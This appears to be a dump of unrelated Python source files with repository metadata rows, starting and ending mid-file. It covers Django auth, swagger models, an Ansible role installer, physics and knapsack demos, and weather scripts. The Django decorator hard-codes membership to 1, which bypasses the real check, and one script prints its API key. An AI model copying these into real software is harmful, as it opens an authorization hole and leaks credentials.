            userinf = get_object_or_404(WxUserinfo, openid=openid)
            request.session['nickname'] = userinf.nickname
            # request.session['is_member'] = userinf.is_member
            # NOTE(review): is_member is hard-coded to 1 (real lookup commented
            # out above) — looks like debug/testing leftover; confirm before use.
            request.session['is_member'] = 1
            request.session['headimgurl'] = userinf.headimgurl
            request.session['role'] = userinf.member_role.id if userinf.member_role else 0
            return func(request, *args, **kwargs)
    return wrapper
| [
"5971158@qq.com"
] | 5971158@qq.com |
0b18106e68e7b8b158f4ee65cfb171cec8fa86ad | 886a374cc162a64f8a1f68548e7229b0354d232a | /pandajedi/jedisetup/GenTaskSetupper.py | e84219873e9314f9bf8257e191b09ff834f8b641 | [
"Apache-2.0"
] | permissive | pavlo-svirin/panda-jedi | f6cf9a4ddbb4d1525ad08de5167cf97a5f82f6a5 | 635dfbd38d85ebc8f837b06cbea1203daf291a71 | refs/heads/master | 2020-03-23T10:54:34.911666 | 2017-02-15T22:52:42 | 2017-02-15T22:52:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 602 | py | from pandajedi.jedicore.MsgWrapper import MsgWrapper
from pandajedi.jedicore import Interaction
from TaskSetupperBase import TaskSetupperBase
# logger
from pandacommon.pandalogger.PandaLogger import PandaLogger
logger = PandaLogger().getLogger(__name__.split('.')[-1])
# task setup for general purpose
class GenTaskSetupper (TaskSetupperBase):
# constructor
def __init__(self,taskBufferIF,ddmIF):
TaskSetupperBase.__init__(self,taskBufferIF,ddmIF)
# main to setup task
def doSetup(self,taskSpec,datasetToRegister,pandaJobs):
return self.SC_SUCCEEDED
| [
"tmaeno@bnl.gov"
] | tmaeno@bnl.gov |
0ee9c877642b14ad79d684f02024646632c5e64e | 62edb9b550ef41899e8d80edbd72fc66898c37b8 | /swagger_client/models/linked_artifact.py | 17552248e7be92499bab954997a82fed56eb415f | [
"Apache-2.0"
] | permissive | isabella232/qtest-swagger-client | 6a5575655b8af16f25fdde1eef056fec1c128081 | 28220aa95d878922ca4b35c325706932adabea4e | refs/heads/master | 2023-07-11T00:50:27.980979 | 2018-06-20T15:48:02 | 2018-06-20T15:48:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,941 | py | # coding: utf-8
"""
qTest Manager API Version 8.6 - 9.1
qTest Manager API Version 8.6 - 9.1
OpenAPI spec version: 8.6 - 9.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class LinkedArtifact(object):
    """Swagger model for an artifact linked to another qTest artifact.

    NOTE: originally produced by swagger-codegen; this hand-written version
    is behaviour-compatible with the generated model.
    """

    def __init__(self, id=None, pid=None, link_type=None, _self=None):
        """Build a LinkedArtifact.

        :param id: numeric ID of the linked artifact
        :param pid: human-readable PID of the linked artifact
        :param link_type: relationship between source and linked artifact
        :param _self: URL of the linked artifact
        """
        # Swagger bookkeeping: attribute name -> declared type.
        self.swagger_types = {
            'id': 'int',
            'pid': 'str',
            'link_type': 'str',
            '_self': 'str'
        }
        # Attribute name -> JSON field name in the API payload.
        self.attribute_map = {
            'id': 'id',
            'pid': 'pid',
            'link_type': 'link_type',
            '_self': 'self'
        }
        self._id = id
        self._pid = pid
        self._link_type = link_type
        self.__self = _self

    @property
    def id(self):
        """Numeric ID of the linked artifact."""
        return self._id

    @id.setter
    def id(self, id):
        self._id = id

    @property
    def pid(self):
        """PID of the linked artifact."""
        return self._pid

    @pid.setter
    def pid(self, pid):
        self._pid = pid

    @property
    def link_type(self):
        """Type of relationship between source and linked artifact."""
        return self._link_type

    @link_type.setter
    def link_type(self, link_type):
        self._link_type = link_type

    @property
    def _self(self):
        """URL of the linked artifact."""
        return self.__self

    @_self.setter
    def _self(self, _self):
        self.__self = _self

    def to_dict(self):
        """Return the model's properties as a dict, recursing into nested models."""
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [item.to_dict() if hasattr(item, "to_dict") else item
                                for item in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {key: (val.to_dict() if hasattr(val, "to_dict") else val)
                                for key, val in value.items()}
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Return the pretty-printed string form of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """True when ``other`` is a LinkedArtifact with equal state."""
        if not isinstance(other, LinkedArtifact):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self == other
"ryan.gard@rackspace.com"
] | ryan.gard@rackspace.com |
481ad6fb62ef15a1ee98f3b5f4350de4a9dcbd52 | 978c9a1dd27a30b32eceed7f1518a26292695891 | /python/2021/other/weather_api.py | f0b71270fdf2f0517f792a8c2216904cb24f3455 | [] | no_license | detcitty/100DaysOfCode | 4da3407bdc4170f9d042f49e6c94a8469f8808f5 | a3d989ea56491f89ece5191d5246166ca01d2602 | refs/heads/master | 2023-08-09T04:45:51.842305 | 2023-07-21T17:02:08 | 2023-07-21T17:02:08 | 178,976,277 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | import os
import requests
import json
# Credentials for the EPA AQS API, read from the environment so they are
# never hard-coded in the source.
KEY = os.getenv('AQS_API_KEY')
EMAIL = os.getenv('MY_EMAIL')
print(KEY)  # NOTE(review): debug print of the API key -- remove before sharing logs

# EPA AQS "monitors by site" endpoint.
# Fixed: the URL had a leading space and misspelled "monitors" as
# "moniters", so every request failed.
url = 'https://aqs.epa.gov/data/api/monitors/bySite'

# Query parameters: AQS expects bdate/edate as YYYYMMDD integers and
# state/county/site as AQS codes (49/35/13 -- presumably Utah / Salt Lake /
# site 13; verify against the AQS code tables).
params = {
    'email': EMAIL,
    'key': KEY,
    'param': 'ALL',
    'bdate': 20210101,
    'edate': 20210214,
    'state': 49,
    'county': 35,
    'site': 13
}
def jprint(obj):
    """Pretty-print *obj* as key-sorted, indented JSON.

    Fixed: the original built the JSON text but never printed it, and the
    request/print statements were indented inside this function, so running
    the script did nothing.
    """
    text = json.dumps(obj, sort_keys=True, indent=4)
    print(text)


if __name__ == '__main__':
    # Fetch the monitor data and pretty-print the JSON response.
    response = requests.get(url, params=params)
    jprint(response.json())
"devin.etcitty@gmail.com"
] | devin.etcitty@gmail.com |
ed90d21b756c2faab22171990cb6be9c38c4d785 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/0e16a5f3ee9b8c7e931b860f7790ea9a6197651b-<install>-bug.py | cf7b852b3186bff51a0088e47a08ccab0dae2941 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,338 | py | def install(self):
    # Download (or locate) the role archive and extract it into self.path.
    # Resolution order: SCM checkout (self.scm), local tarball path, direct
    # URL, or a name lookup against the Galaxy API.  Returns True on a
    # successful install, False when no archive could be obtained; raises
    # AnsibleError on any unrecoverable problem.
    if self.scm:
        # create a tar archive from the SCM checkout described by self.spec
        tmp_file = RoleRequirement.scm_archive_role(**self.spec)
    elif self.src:
        if os.path.isfile(self.src):
            # installing a local tarball; used as-is, not deleted afterwards
            tmp_file = self.src
        elif ('://' in self.src):
            # direct URL to an archive
            role_data = self.src
            tmp_file = self.fetch(role_data)
        else:
            # plain role name: resolve role (and version) through the Galaxy API
            api = GalaxyAPI(self.galaxy)
            role_data = api.lookup_role_by_name(self.src)
            if (not role_data):
                raise AnsibleError(('- sorry, %s was not found on %s.' % (self.src, api.api_server)))
            role_versions = api.fetch_role_related('versions', role_data['id'])
            if (not self.version):
                # No explicit version: prefer the highest published version,
                # then the role's default branch, then 'master'.
                if (len(role_versions) > 0):
                    loose_versions = [LooseVersion(a.get('name', None)) for a in role_versions]
                    loose_versions.sort()
                    self.version = str(loose_versions[(- 1)])
                elif role_data.get('github_branch', None):
                    self.version = role_data['github_branch']
                else:
                    self.version = 'master'
            elif (self.version != 'master'):
                # An explicit version (other than 'master') must exist on the server.
                if (role_versions and (self.version not in [a.get('name', None) for a in role_versions])):
                    raise AnsibleError(('- the specified version (%s) of %s was not found in the list of available versions (%s).' % (self.version, self.name, role_versions)))
            tmp_file = self.fetch(role_data)
    else:
        raise AnsibleError('No valid role data found')
    if tmp_file:
        display.debug(('installing from %s' % tmp_file))
        if (not tarfile.is_tarfile(tmp_file)):
            raise AnsibleError('the file downloaded was not a tar.gz')
        else:
            if tmp_file.endswith('.gz'):
                role_tar_file = tarfile.open(tmp_file, 'r:gz')
            else:
                role_tar_file = tarfile.open(tmp_file, 'r')
            # Locate the role metadata (meta/main.yml) inside the archive.
            meta_file = None
            members = role_tar_file.getmembers()
            for member in members:
                if (self.META_MAIN in member.name):
                    meta_file = member
                    break
            if (not meta_file):
                raise AnsibleError('this role does not appear to have a meta/main.yml file.')
            else:
                try:
                    self._metadata = yaml.safe_load(role_tar_file.extractfile(meta_file))
                except:
                    # NOTE(review): bare except also swallows KeyboardInterrupt etc.
                    raise AnsibleError('this role does not appear to have a valid meta/main.yml file.')
            display.display(('- extracting %s to %s' % (self.name, self.path)))
            try:
                if os.path.exists(self.path):
                    if (not os.path.isdir(self.path)):
                        raise AnsibleError('the specified roles path exists and is not a directory.')
                    elif (not getattr(self.options, 'force', False)):
                        raise AnsibleError(('the specified role %s appears to already exist. Use --force to replace it.' % self.name))
                    elif (not self.remove()):
                        raise AnsibleError(("%s doesn't appear to contain a role.\n please remove this directory manually if you really want to put the role here." % self.path))
                else:
                    os.makedirs(self.path)
                # Extract regular files and symlinks, dropping the leading
                # archive directory and filtering out path parts that could
                # escape the destination ('..', '~', '$').
                for member in members:
                    if (member.isreg() or member.issym()):
                        parts = member.name.split(os.sep)[1:]
                        final_parts = []
                        for part in parts:
                            if ((part != '..') and ('~' not in part) and ('$' not in part)):
                                final_parts.append(part)
                        member.name = os.path.join(*final_parts)
                        role_tar_file.extract(member, self.path)
                # Record the installed version for later 'list'/'remove' use.
                self._write_galaxy_install_info()
            except OSError as e:
                raise AnsibleError(('Could not update files in %s: %s' % (self.path, str(e))))
            display.display(('- %s was installed successfully' % self.name))
            # Best-effort cleanup of the downloaded archive.
            try:
                os.unlink(tmp_file)
            except (OSError, IOError) as e:
                display.warning(('Unable to remove tmp file (%s): %s' % (tmp_file, str(e))))
            return True
    return False
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
d3878e2d9c6758ee16ae2176a95d594c2e3238eb | 0ee88932af5b6ed088e471abcbd5f40fd9cbd688 | /Course/Book/Programmer_avec_Python3/8-Tkinter/attractionclic.py | 0e6e7adc9081b4ab66e95a67b4f2a1cbe9c66bd3 | [] | no_license | BjaouiAya/Cours-Python | 48c740966f9814e1045035ffb902d14783d36194 | 14b306447e227ddc5cb04b8819f388ca9f91a1d6 | refs/heads/master | 2021-06-10T22:17:38.731030 | 2016-11-11T16:45:05 | 2016-11-11T16:45:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,009 | py | #! /usr/bin/env python
# -*- coding:Utf8 -*-
"PROGRAMME AUTOUR DE L'ATTRACTION TERRESTRE AVEC CLIC"
################################################################
############# Importation fonction et modules : ################
################################################################
from tkinter import *
from math import sqrt
###################################################################################################
############# Gestion d'évènements : définition de différentes fonctions utiliées : ##############
###################################################################################################
def avance(n, xcoord, ycoord):
    """Move astre *n* by (xcoord, ycoord) pixels and refresh the readouts.

    Updates the global position lists, redraws the oval on the canvas,
    recomputes the distance/force labels and rescales the movement step.

    :param n: index of the astre to move (0 = blue, 1 = green)
    :param xcoord: horizontal displacement in pixels
    :param ycoord: vertical displacement in pixels
    """
    # Fixed: 'decalage' added to the global statement -- the original
    # assigned it to a local at the end, so the adaptive step was never
    # applied.  Note it becomes 0 when the two astres overlap.
    global x, y, decalage
    x[n], y[n] = x[n] + xcoord, y[n] + ycoord
    can1.coords(astre[n], x[n], y[n], x[n] + xx, y[n] + yy)
    # Pixel distance between the two astres.
    distanceastres = mesuredistance(x[0], x[1], y[0], y[1])
    # Real-world distance: 1 pixel is scaled by 1e9 here, although the
    # original comment said 1 000 000 km -- TODO confirm the intended scale.
    distancereele = distanceastres * 1e9
    force = forceG(m1, m2, distancereele)
    distance.configure(text='Distance de ' + str(distancereele) + ' Km')
    forcegrav.configure(text='Force de ' + str(force) + ' KN')
    # Step size scales with the separation so the buttons stay responsive.
    decalage = distanceastres / 10
def avanceclic(event):
    """Click handler: teleport the selected astre to the click position.

    The selected astre (global ``masseclic``) is centred on the click by
    subtracting half the oval size, then the distance/force labels and the
    movement step are refreshed exactly like :func:`avance`.
    """
    # Fixed: 'decalage' added to the global statement -- the original
    # assigned it to a local at the end, so the adaptive step was never
    # applied.
    global x, y, decalage
    # Centre the oval on the click (canvas coords are the top-left corner).
    x[masseclic], y[masseclic] = event.x - xx / 2, event.y - yy / 2
    can1.coords(astre[masseclic], x[masseclic], y[masseclic], x[masseclic] + xx, y[masseclic] + yy)
    # Pixel distance between the two astres.
    distanceastres = mesuredistance(x[0], x[1], y[0], y[1])
    # Real-world distance: 1 pixel is scaled by 1e9 here, although the
    # original comment said 1 000 000 km -- TODO confirm the intended scale.
    distancereele = distanceastres * 1e9
    force = forceG(m1, m2, distancereele)
    distance.configure(text='Distance de ' + str(distancereele) + ' Km')
    forcegrav.configure(text='Force de ' + str(force) + ' KN')
    # Step size scales with the separation so the buttons stay responsive.
    decalage = distanceastres / 10
def forceG(m1, m2, distanceastres):
    """Gravitational pull between masses m1 and m2, truncated to whole kN.

    Uses Newton's law with G = 6.67e-11; the distance is taken in whatever
    unit the caller supplies (treated as metres by the constant).

    Returns the string 'infini' when the separation is zero, which the
    caller displays directly instead of a number.
    """
    if distanceastres == 0:
        # avoid a ZeroDivisionError; the label then shows 'infini'
        return 'infini'
    newtons = m1 * m2 * 6.67e-11 / distanceastres ** 2
    return int(newtons / 1000)
def mesuredistance(x1, x2, y1, y2):
    """Euclidean distance between (x1, y1) and (x2, y2), truncated to int."""
    dx = x2 - x1
    dy = y2 - y1
    return int(sqrt(dx ** 2 + dy ** 2))
def deplacement_gauche1():
    """Arrow handler: step the blue astre (index 0) left."""
    avance(0, -decalage, 0)

def deplacement_droite1():
    """Arrow handler: step the blue astre (index 0) right."""
    avance(0, decalage, 0)

def deplacement_bas1():
    """Arrow handler: step the blue astre (index 0) down."""
    avance(0, 0, decalage)

def deplacement_haut1():
    """Arrow handler: step the blue astre (index 0) up."""
    avance(0, 0, -decalage)

def deplacement_gauche2():
    """Arrow handler: step the green astre (index 1) left."""
    avance(1, -decalage, 0)

def deplacement_droite2():
    """Arrow handler: step the green astre (index 1) right."""
    avance(1, decalage, 0)

def deplacement_bas2():
    """Arrow handler: step the green astre (index 1) down."""
    avance(1, 0, decalage)

def deplacement_haut2():
    """Arrow handler: step the green astre (index 1) up."""
    avance(1, 0, -decalage)
def selection1():
    """Make the blue astre (index 0) the target of canvas clicks."""
    global masseclic
    masseclic = 0

def selection2():
    """Make the green astre (index 1) the target of canvas clicks."""
    global masseclic
    masseclic = 1
######################################################
############## Programme principal : #################
######################################################
"coordonnées de base"
x = [50, 10] # liste pour les coordonnées en x des astres
y = [100, 50] # liste pour les coordonnées en y des astres
"taille pointeur"
xx, yy = 30, 30
"masse des astres"
m1 = 6e24
m2 = 6e24
"décalage de base"
decalage = 5
masseclic = 0 # permet de sélectionner une ou l'autre des masses
"Liste permettant de mémoriser les indices du dessin"
astre = [0]*2 # liste servant à mémoriser les références des dessins
"widgets"
fen1 = Tk()
fen1.title("Attration atrale")
can1 = Canvas(fen1, width = 400, height = 200, bg = 'grey')
can1.grid(row =2, column =1, columnspan =3, padx = 20, pady = 20)
astre[0] = can1.create_oval(x[0], y[0], x[0]+xx, y[0]+yy, width = 2, fill = 'blue')
astre[1] = can1.create_oval(x[1], y[1], x[1]+xx, y[1]+yy, width = 2, fill = 'green')
"textes des différentes fenêtres"
valmasse1 = Label(fen1, text = 'Astre 1 : '+ str(m1) + ' Kg')
valmasse2 = Label(fen1, text = 'Astre 2 : '+ str(m2) + ' Kg')
distance = Label(fen1)
forcegrav = Label(fen1)
valmasse1.grid(row = 1, column = 1, padx = 5, pady = 5, sticky = W)
valmasse2.grid(row = 1, column = 3, padx = 5, pady = 5, sticky = E)
distance.grid(row = 4, column = 1, padx = 5, pady = 5)
forcegrav.grid(row = 4, column = 3, padx = 5, pady = 5)
############################################
"GROUPE ASTRE 1 AVEC 4 BOUTTONS"
fra1 = Frame(fen1) # association dans un cadre un ensemble de bouttons
fra1.grid(row = 3, column = 1, sticky = W, padx = 10, pady = 10)
Button(fra1, fg = 'blue', command = deplacement_bas1, text = 'v').pack(side = LEFT)
Button(fra1, fg = 'blue', command = deplacement_haut1, text = '^').pack(side = LEFT)
Button(fra1, fg = 'blue', command = deplacement_droite1, text = '->').pack(side = LEFT)
Button(fra1, fg = 'blue', command = deplacement_gauche1, text = '<-').pack(side = LEFT)
"GROUPE ASTRE 2 AVEC 4 BOUTTONS"
fra2 = Frame(fen1)
fra2.grid(row = 3, column = 3, sticky = E, padx = 10, pady = 10)
Button(fra2, fg = 'green', command = deplacement_bas2, text = 'v').pack(side =LEFT)
Button(fra2, fg = 'green', command = deplacement_haut2, text = '^').pack(side =LEFT)
Button(fra2, fg = 'green', command = deplacement_droite2, text = '->').pack(side =LEFT)
Button(fra2, fg = 'green', command = deplacement_gauche2, text = '<-').pack(side =LEFT)
#############################################
"permet de bouger les 2 astres par sélection par un boutton puis nouvelle position par clic"
can1.bind("<Button-1>", avanceclic)
Button(fen1, fg = 'black', command = selection1, text = 'Astre bleu').grid(row = 0, column = 1)
Button(fen1, fg = 'black', command = selection2, text = 'Astre vert').grid(row = 0, column = 3)
#############################################
Button(fen1, command = fen1.quit, text = 'Quitter').grid(row = 5, column = 3)
fen1.mainloop()
| [
"jeremybois@rocketmail.com"
] | jeremybois@rocketmail.com |
fbb9cca9d323db892b0cf407f976508f8e25e925 | 7c73ae5308f16030de337e2ad6dc30ac3f4a6d05 | /动态规划/背包问题.py | f1bccd5dbdd11c3581e2c1b56352eae39701c2aa | [] | no_license | pol9111/algorithms | c2508470e4e8c46f4368411a9614adbb210cfa33 | 4bd5d8cb3db9d15c23ebf217181a5f54c00c1687 | refs/heads/master | 2023-06-07T20:47:33.200001 | 2023-05-27T16:50:24 | 2023-05-27T16:50:24 | 150,764,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,799 | py |
# Test data matching the classic illustrated example (guitar, stereo,
# laptop, phone); the numbers are kept identical to the diagram.
w = [0, 1, 4, 3, 1] # weights of the n items (slot 0 is unused padding)
p = [0, 1500, 3000, 2000, 2000] # values of the n items (slot 0 is unused padding)
n = len(w) - 1 # number of items
m = 4 # carrying capacity of the knapsack
x = [] # indices of the items put into the knapsack (filled by the solver)
v = 0  # NOTE(review): never read afterwards; the result comes from the function's return value
# optp[i][j]: best value achievable using only the first i items in a
# sub-knapsack of capacity j.
optp = [[0 for col in range(m + 1)] for raw in range(n + 1)]
# optp is an (n+1) x (m+1) grid of zeros: rows = items, columns = capacities.
print(optp)
def knapsack_dynamic(w, p, n, m, x):
    """Solve the 0/1 knapsack over the module-level DP table ``optp``.

    w, p -- weights and values, 1-indexed (slot 0 unused)
    n, m -- item count and knapsack capacity
    x    -- output list; receives the chosen item indices (highest first)

    Returns the best achievable total value.  Also prints the filled DP
    table, like the original implementation.
    """
    # Fill optp row by row: optp[item][cap] is the best value using only
    # the first `item` items within capacity `cap`.
    for item in range(1, n + 1):
        for cap in range(1, m + 1):
            best_without = optp[item - 1][cap]
            if cap >= w[item]:
                best_with = optp[item - 1][cap - w[item]] + p[item]
                optp[item][cap] = max(best_without, best_with)
            else:
                optp[item][cap] = best_without
    print(optp)
    # Walk back from the final cell: a value jump between rows means the
    # item of that row was taken.
    remaining = m
    for item in range(n, 0, -1):
        if optp[item][remaining] > optp[item - 1][remaining]:
            x.append(item)
            remaining = remaining - w[item]
    # Best total value sits in the last row / last column of the table.
    return optp[n][m]
# Solve and report: best total value, chosen item indices (in reverse
# discovery order), and the full DP table.
print('最大值为:' + str(knapsack_dynamic(w, p, n, m, x)))
print('物品的索引:',x)
print('物品的索引:',optp)
| [
"biscuit36@163.com"
] | biscuit36@163.com |
b71cfdda577fac6fe368c3a6dae442d8a5020cd7 | d77f44f98f695a3bdb00f021ad2e685483b032c5 | /examples/plot_events.py | f47d98975f040e2e7d60c3d51cd76512b703b869 | [
"MIT"
] | permissive | thomasgas/pyeventio | d8d5df32f8f644b7f8877ba370d3c5179bef58a8 | 0edfb05b56ed3a3e8a37c0292cede90598464b8f | refs/heads/master | 2020-04-21T21:59:11.105773 | 2019-04-29T16:04:51 | 2019-04-29T16:04:51 | 169,896,133 | 0 | 0 | MIT | 2019-02-09T18:01:11 | 2019-02-09T18:01:10 | null | UTF-8 | Python | false | false | 2,319 | py | import matplotlib.pyplot as plt
import numpy as np
from argparse import ArgumentParser
from functools import lru_cache
import astropy.units as u
from ctapipe.instrument import CameraGeometry
from ctapipe.visualization import CameraDisplay
from eventio.simtel import SimTelFile
# Command line: the only argument is the simtel file to display.
parser = ArgumentParser()
parser.add_argument('inputfile')
args = parser.parse_args()
@lru_cache()
def build_cam_geom(simtel_file, telescope_id):
    """Build a ctapipe CameraGeometry from a telescope's camera settings.

    Results are memoised per (simtel_file, telescope_id) via lru_cache, so
    each geometry is only constructed once (the same file object must be
    passed for the cache to hit).

    :param simtel_file: an open eventio SimTelFile
    :param telescope_id: id of the telescope inside that file
    :return: CameraGeometry describing the telescope's camera
    :raises ValueError: if the pixel shape code is not recognised
    """
    cam_data = simtel_file.telescope_descriptions[telescope_id]['camera_settings']
    shape_code = cam_data['pixel_shape'][0]
    n_pixels = cam_data['n_pixels']

    # Shape codes: 2 = square, 1 = hexagonal, -1 = unknown.  For -1 we guess
    # from the pixel count, exactly as the (previously duplicated) branches
    # of the original did.
    if shape_code == -1:
        shape_code = 2 if n_pixels > 2000 else 1

    if shape_code == 2:
        pix_type = 'square'
        pix_rotation = 0 * u.deg
    elif shape_code == 1:
        pix_type = 'hexagonal'
        # LST (1855 pixels) has 0 deg rotation, MST 30
        # (flat top vs. pointy top hexagons)
        pix_rotation = 0 * u.deg if n_pixels == 1855 else 30 * u.deg
    else:
        # Previously an unrecognised code fell through and raised a
        # confusing NameError on pix_type; fail explicitly instead.
        raise ValueError(
            'unsupported pixel_shape code {!r} for telescope {}'.format(
                shape_code, telescope_id
            )
        )

    return CameraGeometry(
        cam_id='CAM-{}'.format(telescope_id),
        pix_id=np.arange(n_pixels),
        pix_x=cam_data['pixel_x'] * u.m,
        pix_y=cam_data['pixel_y'] * u.m,
        pix_area=cam_data['pixel_area'] * u.m**2,
        pix_type=pix_type,
        cam_rotation=cam_data['cam_rot'] * u.rad,
        pix_rotation=pix_rotation,
    )
with SimTelFile(args.inputfile) as f:
    # One figure per telescope event; plt.show() blocks until each window
    # is closed.
    for array_event in f:
        print('Event:', array_event['event_id'])
        for telescope_id, event in array_event['telescope_events'].items():
            print('Telescope:', telescope_id)
            # Prefer full waveforms; fall back to integrated sums with a
            # dummy trailing axis so both cases are 3-dimensional
            # (presumably gain x pixel x sample -- TODO confirm).
            data = event.get('adc_samples')
            if data is None:
                data = event['adc_sums'][:, :, np.newaxis]
            # Sum over samples of the first gain channel: one value per pixel.
            image = data[0].sum(axis=1)
            cam = build_cam_geom(f, telescope_id)
            plt.figure()
            disp = CameraDisplay(cam)
            disp.image = image
            plt.show()
| [
"maximilian.noethe@tu-dortmund.de"
] | maximilian.noethe@tu-dortmund.de |
6aecda70e197f8b3c3b83e2030bc806ffecc4a41 | 6b96a11195094a0023a059ba7d5df95ce58c56f1 | /1359A.py | 643057f4f600e4de77f8dcee5062457fd853ebad | [] | no_license | ldfdev/CodeForces-Div2-Problems | d932b09ee14a430fd0054d5b295f6016553be2b7 | d18824a4330a4593099d249496ae22f3f69d5f44 | refs/heads/master | 2021-08-11T03:29:18.772870 | 2021-07-25T07:21:09 | 2021-07-29T20:09:43 | 72,371,376 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | def inp():
return list(map(int, input().split()))
def solve():
[cards, jokers, players] = inp()
if jokers == 0:
return 0
if cards == jokers:
return 0
lucky_player = cards // players
if jokers <= lucky_player:
return jokers
jokers -= lucky_player
if jokers % (players - 1) == 0:
return lucky_player - (jokers // (players - 1))
return lucky_player - 1 - (jokers // (players - 1))
if __name__=='__main__':
[tests] = inp()
for _ in range(tests):
print(solve()) | [
"ldf.develop@gmail.com"
] | ldf.develop@gmail.com |
7ad767b1b94d4c9a1df15c7bfc4abe595a0b2a13 | 325bee18d3a8b5de183118d02c480e562f6acba8 | /taiwan/italy/start.py | a394a4bb37e379ca7be1a371406ca0376d18a494 | [] | no_license | waynecanfly/spiderItem | fc07af6921493fcfc21437c464c6433d247abad3 | 1960efaad0d995e83e8cf85e58e1db029e49fa56 | refs/heads/master | 2022-11-14T16:35:42.855901 | 2019-10-25T03:43:57 | 2019-10-25T03:43:57 | 193,424,274 | 4 | 0 | null | 2022-11-04T19:16:15 | 2019-06-24T03:00:51 | Python | UTF-8 | Python | false | false | 1,038 | py | import os
"""
taiwanlistzh下载台湾中文列表,已做更新功能
taiwanlisten下载台湾英文列表,已做更新功能
info_enAll首次存量下载台湾英文基本信息
info_en为下载台湾增量基本信息而生
以下若要更新需覆盖
taiwanFileAllv3下载英文财报,原网站最新只到2018年3月份
info_zhAll下载中文基本信息:"重要子公司基本資料","重要子公司異動說明", "被投資控股公司基本資料" (文件)
info_zh下载中文基本信息:"公司基本資料" (格式化)
info_zh2下载中文基本信息:"歷年變更登記"(文件) 需要界面化才能获取数据,需要windows系统
"""
os.chdir('/root/spiderItem/taiwan/italy/spiders')
os.system("python3 taiwanlistzh.py")
# os.system('python3 info_zhAll.py')
os.chdir('/root/spiderItem/taiwan/italy/script2')
os.system("python3 taiwanlisten.py")
os.system('python3 info_en.py')
# os.system("python3 taiwanFileAllv3.py")
# os.system('python3 info_zh.py')
# os.system('python3 info_zh2.py')
| [
"1370153124@qq.com"
] | 1370153124@qq.com |
5b240e6a01eaaca3b6de4c49d75c041e4867cf3e | 6d1df0707865398d15f508390ca595215210b504 | /xmonad/poll_weather.py | 0d9a3c2243aa6bfa26632e7e321d24e34684e44b | [] | no_license | supermiiiiii/scripts | 94a27741432c40781b3d577334e72f73f1efb914 | 524de087175d2e8b7e3adeacdd648fed9e07e204 | refs/heads/master | 2023-02-24T19:15:38.888248 | 2021-01-30T14:49:49 | 2021-01-30T14:49:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,351 | py | """Writes a weather report to some bar using a FIFO."""
import datetime as dt
import re
import subprocess as sp # noqa: F401
import sys
import time
from typing import NamedTuple, Optional, Sequence
import gutils
from gutils.io import eprint
from loguru import logger as log
@gutils.catch
def main(argv: Sequence[str] = None) -> int:
if argv is None:
argv = sys.argv
args = parse_cli_args(argv)
gutils.logging.configure(__file__, debug=args.debug, verbose=args.verbose)
return run(args)
class Arguments(NamedTuple):
debug: bool
verbose: bool
zipcode: str
weather_cmd: str
attempts: int
timeout: int
max_delay: int
def parse_cli_args(argv: Sequence[str]) -> Arguments:
parser = gutils.ArgumentParser()
parser.add_argument(
"zipcode", nargs="?", default="08060", help="zip code of location"
)
parser.add_argument(
"--weather-cmd",
default="weather",
help=(
"The command used to retrieve the weather report from the"
" command-line."
),
)
parser.add_argument(
"-n",
"--attempts",
type=int,
default=7,
help=(
"How many times should we attempt to run this command in the event"
" of failure/timeout?"
),
)
parser.add_argument(
"-t",
"--timeout",
type=int,
default=30,
help=(
"How long should we wait (in seconds) for the this command to"
" complete?"
),
)
parser.add_argument(
"--max-delay",
default=300,
type=int,
help="The maximum sleep time between command attempts.",
)
args = parser.parse_args(argv[1:])
kwargs = dict(args._get_kwargs())
return Arguments(**kwargs)
def run(args: Arguments) -> int:
raw_output = run_weather_cmd(
args.weather_cmd,
args.zipcode,
attempts=args.attempts,
timeout=args.timeout,
max_delay=args.max_delay,
)
if raw_output is None:
eprint(f"[ERROR] The {args.weather_cmd!r} command failed.")
return 1
loc = get_group("Current conditions at (.*)\n", raw_output)
temp = get_temp(raw_output)
humidity = get_humidity(raw_output)
sky = get_group(r"Sky conditions: ([A-z\s]+)$", raw_output)
wind = get_wind(raw_output)
assert loc is not None
report = format_report(loc, temp, sky, wind, humidity)
print(report)
return 0
def run_weather_cmd(
weather_cmd: str,
zipcode: str,
*,
attempts: int,
timeout: int,
max_delay: int,
) -> Optional[str]:
"""Runs the 'weather' command.
Returns:
Raw output of 'weather' command.
"""
cmd_list = [weather_cmd]
opts = ["--setpath", "/usr/share/weather-util", zipcode, "--no-cache"]
cmd_list.extend(opts)
def log_cmd(msg: str) -> None:
msg = "{!r} command: {}".format(weather_cmd, msg)
log.debug(msg)
rc = None
for i in range(attempts):
if i > 0:
# delay => 10s, 20s, 40s, 80s, ..., max_delay
delay = min(max_delay, 2 ** (i - 1) * 10)
log.debug(f"Waiting {delay}s before trying again.")
time.sleep(delay)
log_cmd(f"Attempt #{i + 1}")
child = sp.Popen(cmd_list, stdout=sp.PIPE, stderr=sp.PIPE)
try:
stdout, stderr = child.communicate(timeout=timeout)
except sp.TimeoutExpired:
log_cmd(f"TIMEOUT (after {timeout}s)")
else:
rc = child.returncode
output = stdout.decode().strip()
if rc == 0:
log_cmd("SUCCESS")
break
output += stderr.decode().strip()
